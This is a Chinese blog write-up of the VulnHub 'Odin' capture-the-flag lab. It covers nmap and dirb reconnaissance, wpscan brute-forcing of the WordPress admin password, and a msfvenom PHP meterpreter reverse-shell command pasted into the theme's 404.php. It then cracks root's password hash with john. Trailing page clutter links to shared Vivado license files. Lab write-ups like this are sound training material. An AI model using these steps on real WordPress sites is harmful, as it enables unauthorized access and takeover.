vulnhub-Odin

最新推荐文章于 2025-04-04 23:39:01 发布
最新推荐文章于 2025-04-04 23:39:01 发布
阅读量3.3k 收藏 1
点赞数 2
分类专栏: vulnhub靶机 文章标签: 安全 渗透测试 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/weixin_55638067/article/details/123901752
版权

靶机下载地址:https://download.vulnhub.com/odin/odin.ova

靶机描述:

  • 一、环境信息

靶机:192.168.163.139

攻击机:192.168.163.128

  • 二、信息收集

Nmap -sS -A -n -p- 192.168.163.139

这里可以看到开放了80端口

访问后是加载不出来的,在靶机描述里其实有提示需要我们将靶机添加到hosts里

将192.168.163.139 odin添加到hosts里后再次访问页面就会有网页弹出来了

大概浏览了一下这个网页并没有什么有用的信息

我们接着使用dirb扫描一下网页后台

      

这里可以看到有一个wp-admin页面,这个可以说是很熟悉了

我先尝试了一下1234的用户名,根据它的回显是没有这个用户

我再尝试了admin弱口令登录,这次它回显的是我的密码出现错误,可以看出是有admin这个用户的

现在我们用户名有了就该尝试爆破密码了

这里我用的是kali自带的字典

命令:wpscan –url http://192.168.163.139 -U admin -P /usr/share/wordlists/rockyou.txt

爆破出来密码

账号 admin

密码 qwerty

现在我们就可以登录wp-admin了

接下来的操作就非常的熟悉了

先找到404.php页面

然后制作一个反弹shell木马

msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.163.128 lport=4444

这里我就不放到文件里面了,直接复制到404.php里就好了

开启监听

反弹shell

三、提权

脱shell后要优化终端,这个靶机没有python只有python3

使用python3一样的优化终端

在做这种wp网页的靶机时,我们要习惯查看网页后台的配置文件

在最下面有一个root用户加密过的密码

我们使用john对它进行解密

这样我们就得到root用户的密码jasmine

切换到root用户

去到root目录,查看flag,这个靶机的flag不跟其他的靶机一样就叫flag.txt root.txt什么的,这个flag的文件是作者的名字

文件里面是一串base64编码,再解码后是一个网页连接,里面是一段音乐,因为要翻墙这里我就不演示了

总的来说这个靶机还是比较简单的,虽然有些绕

对于wp网页后台,我们经常拿到用户名密码就再修改404.php页面反弹shell,这里我再演示用msfconsole反弹shell

xilinx Vivado 永久license
oJVnLtjtHu的博客
01-17 5704
幸运的是,有一个令人兴奋的消息:xilinx Vivado 的永久许可证现在可用,而且可以在2037年之前的任何版本上使用,并且使用并不受限于特定的计算机设备。在这些信息中,有时候会提到一些共享的许可证文件或者注册码,通过使用这些文件或者码,就能够获得永久的xilinx Vivado许可证。但幸运的是,有一些途径可以获得这个许可证,而且还是完全免费的。对于许多开发人员和工程师来说,获得永久许可证是一件非常重要的事情,因为这意味着他们可以无需担心在未来的版本更新中的许可问题,以及不受计算机设备的限制。
Vivado lisence(2017.1版本,截至2018.3版本亲测可用)
02-15
Vivado lisence(2017.1版本,截至2018.3版本亲测可用),实验室用的lisence,支持部分高级功能
vivado license
12-23
本人亲测可用。(注意:修改license文件之后,必须重启电脑才能用)
xilinx Vivado 永久license,2037年之前的版本都可以使用,不限电脑
01-08
xilinx Vivado 永久license,2037年之前的版本都可以使用,不限电脑
vivado2022.2下载安装
最新发布
Hason866的博客
04-04 538
vivado2022.2下载安装
Vivado license 永久
04-07
2018.3测试可用,各种IP超级齐全,测试了srio可用,Jesd等IP均显示正常,理论上所有版本应该都支持,大家下来看看。
vivadolicense
qq_31253859的博客
12-31 8167
INCREMENT VIVADO_HLS xilinxd 2037.05 permanent uncounted AF3E86892AA2 VENDOR_STRING=License_Type:Bought HOSTID=ANY ISSUER=“Xilinx Inc” START=19-May-2016 TS_OK INCREMENT Vivado_System_Edition xilinxd 2037.05 permanent uncounted A1074C37F742 VENDOR_STRING=Li
必看干货 | 学习Vivado如何获取License
太阳岭,仙姑洞,雷公坡,狐狸湾
07-20 3万+
学习Vivado如何获取License Vivado入门必看 导读 老铁,还在为如何获取Vivado License而扎心?无论此刻你是一个需要安装Xilinx Vivado工具链的入门菜鸟,还是已有license过期的Vivado老铁,今儿咱就借着这篇文章,把学习「Vivado如何获取License」这档子事儿给说通透咯~ 手把手教程,分四部分讲述: ● Part 1
vivado license官方申请
星旭的博客
08-01 1835
1、选择 Generate a License Key。3、搜索license,输入MAC地址即可。vivado license官方申请。2、输入个人基本信息。
xilinx 账户申请以及vivado 安装
热门推荐
sheng__jun的博客
03-08 4万+
老铁,还在为如何获取Vivado License而扎心?无论此刻你是一个需要安装Xilinx Vivado工具链的入门菜鸟,还是已有license过期的Vivado老铁,今儿咱就借着这篇文章,把学习「Vivado如何获取License」这档子事儿给说通透咯~ 手把手教程,分三部分讲述。码字不易,若是喜欢这篇文章,记得转给身边有需要的朋友们哦!● Part 1:如何注册Xilinx官网账号与Lice...
vivado许可证官网获取方法
qq_43510439的博客
11-28 4988
获取许可证”
vivado license申请
Y__Yshans的博客
01-05 1258
AMD: Product Licensing
vivado软件的安装教程以及license
12-21
vivado软件的安装教程以及license
vivado License 许可证导入
07-03
vivado License 许可证导入,包括HLS、AccelDSP、System Generator、软硬CPU、SOC、嵌入式Linux都可以用 点击菜单栏【Help】,选择【Manage License...】 点击左侧【Get Licence】下的【Load License】 点击右侧的【Copy License...】,选择许可证文件进行加载
2017年最新vivadolicense
11-22
2017年最新vivadolicense,测试可用,拿去不谢~ 2017年最新vivadolicense,测试可用,拿去不谢~
VIVADO 2018.1 license 亲测可用
05-08
VIVADO 2018.1 license 亲测可用 官方2018.1最新版 需要的自取
vivadolicense通用版
02-25
vivado2018版本亲测可用,其他版本也是可以通用的,打开“Manage Xilinx License”,在左侧栏中选择“Load License”,然后在右侧选择“Copy License”。添加license就可以了。
vivado_license
11-23
在标题"vivado_license"中,我们关注的是Vivado的授权问题。Xilinx的软件通常需要有效的许可证才能运行,这些许可证通常以特定的文件格式存在,如".lic"文件。"xilinx_license.lic"就是这样的一个文件,它包含了允许...
vivado 2015 license
12-26
这个“vivado 2015 license”文件对于使用Vivado 2015进行FPGA设计的学生来说至关重要,因为它允许用户在指定的期限内免费或有权限地使用该软件。 在FPGA设计领域,Vivado是一款功能强大的开发环境,它涵盖了从高...
vivado2023 license
11-16
Vivado2023是一款集成开发环境软件,用于设计和验证FPGA(现场可编程门阵列)和可编程逻辑器件。对于使用Vivado2023的用户来说,license是必不可少的。 Vivado2023的license是一种许可证,用于授权用户合法使用该软件。许可证分为多种类型,包括评估许可证、开发许可证和节点许可证等。每种许可证都有不同的使用条件和功能。 评估许可证是免费提供的,让用户可以在一段时间内试用Vivado2023的全部功能。用户可以使用这个许可证来了解软件的性能和特点,对于初学者和小规模项目来说是一个很好的选择。但是,使用评估许可证的用户在使用期限过后需要购买正式的许可证才能继续使用软件。 开发许可证是付费的,可以永久使用Vivado2023的全部功能。这种许可证适用于需要长期使用Vivado2023进行开发的用户,通常是专业的FPGA设计师或工程师。购买开发许可证可以享受Vivado2023的技术支持和更新服务,确保软件始终保持最新的版本和功能。 节点许可证是用于多设备或分布式设计的许可证,可以在多个计算机上安装Vivado2023,并共享使用。节点许可证适用于大规模项目或需要多个处理节点进行设计的用户,可以提高工作效率和资源利用率。 总之,Vivado2023 license是用户在使用Vivado2023时必须考虑的问题。用户可以根据自己的需求选择合适的许可证类型,以便获取最佳的软件使用体验。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Eliaukqwq

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值